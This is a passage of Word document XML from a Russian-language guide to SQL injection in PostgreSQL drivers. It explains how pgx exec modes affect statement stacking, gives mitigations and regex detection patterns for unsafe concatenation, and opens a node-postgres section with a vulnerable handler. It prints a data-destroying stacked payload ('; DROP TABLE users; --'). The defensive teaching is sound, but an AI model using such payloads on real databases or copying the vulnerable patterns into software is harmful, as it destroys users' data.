        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">config.DefaultQueryExecMode = pgx.QueryExecModeSimpleProtocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conn, _ := pgx.ConnectConfig(ctx, config)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С тем же payload и уязвимым кодом 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SELECT id, email FROM users WHERE name = 'x'; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Оба statement-а исполняются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rows.Next()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пройдёт по первому result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отработал тихо.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если разработчик использовал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arg в simple-mode — pgx делает client-side экранирование, payload в значении превращается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'x''; DROP TABLE users; --'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с удвоенной кавычкой) и остаётся буквальной строкой:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, email FROM users WHERE name = 'x''; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Стакинга через значение нет. Уязвимость в simple-mode возникает только при конкатенации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что отличает pgx от других драйверов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Default-mode наиболее строгий из шести</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: extended применяется к любому SQL-тексту, не только при наличии args. Это значит, что даже плохо написанный Go-код (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Query(ctx, "...; ...")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) получает блокировку стакинга на сервере. У asyncpg, psycopg2/3, node-postgres «без args» = simple = уязвимо; у pgx-default «без args» = extended = не уязвимо.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Per-query режим</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: можно передать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgx.QueryExecModeSimpleProtocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> третьим arg в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точечно переключить один запрос. Это удобно для migrations, но создаёт ловушку, если применить в HTTP-обработчике.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server-side prepared statement cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">QueryExecModeCacheStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> каждый уникальный SQL-текст становится named prepared statement. Влияет на размер cache (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_cache_capacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, default 512), но не на безопасность.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Нет API для безопасных identifiers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pgx предлагает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgx.Identifier{schema, table}.Sanitize()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для имён таблиц/колонок (см. 3.16).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigations специфичные для драйвера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 использовать `QueryExecModeSimpleProtocol`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в обработчиках с пользовательским вводом. Этот режим существует для PgBouncer transaction-mode и для legitimate multi-statement (migrations); включать его per-query там, где нужно, а не глобально.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Всегда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$2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-placeholders + args через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">...any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Конкатенация в SQL-строку остаётся анти-паттерном даже при extended-default — не из-за стакинга (сервер заблокирует), а из-за остальных категорий инъекций (UNION, error-based и т.д., см. 3.1–3.4).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динамических identifiers — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgx.Identifier{...}.Sanitize()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (квотит и экранирует), либо whitelist.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коде судьи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\.Query(Row)?\(ctx,\s*"[^"]*"\s*\+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\.Exec\(ctx,\s*"[^"]*"\s*\+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fmt\.Sprintf\([^)]*\)\s*$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> непосредственно перед </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.Query</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Exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, проверка connection config на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">QueryExecModeSimpleProtocol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default_query_exec_mode=simple_protocol</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pgx v5 (2022+) — текущая стабильная, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">QueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> API. Default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CacheStatement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pgx v4 (2019–2022) — старое API, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ConnConfig.PreferSimpleProtocol bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (= extended). Семантика та же.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pgx v3 и старше — deprecated, не покрываем.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pgxpool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (connection pool) — наследует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">QueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от config.</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pgx v5 docs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">QueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://pkg.go.dev/github.com/jackc/pgx/v5#QueryExecMode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pgx repo: README раздел «Query Interface» — https://github.com/jackc/pgx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pgx issue #1090 (поведение simple protocol) — https://github.com/jackc/pgx/issues/1090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pgx issue #1400 (multi-statement) — https://github.com/jackc/pgx/issues/1400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R20 (sources/research.md, строки 335–336)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.6 node-postgres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> node-postgres (npm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, актуальная ветка 8.13.x) — Node.js-драйвер для PostgreSQL, реализует wire-protocol на чистом JavaScript (есть и нативная C-обёртка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg-native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через libpq). Логика выбора протокола в стандартном (не-native) клиенте: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client.query(text)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client.query(text, [])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без values </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">с непустой строкой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">simple query protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (одно сообщение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client.query(text, [v1, v2])</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client.query({ text, values: [...] })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с непустым values-массивом — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">extended protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Parse + Bind + Execute).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client.query({ name, text, values })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — named prepared statement, тоже extended, плюс server-side кэширование по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В simple-режиме node-postgres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не делает client-side экранирование</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: либо values уходят отдельно через extended, либо SQL отправляется как есть. Это значит, что любая конкатенация / template-literal без второго аргумента — раздолье для стакинга.</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app.get('/users', async (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  const { name } = req.query;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  const result = await client.query(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
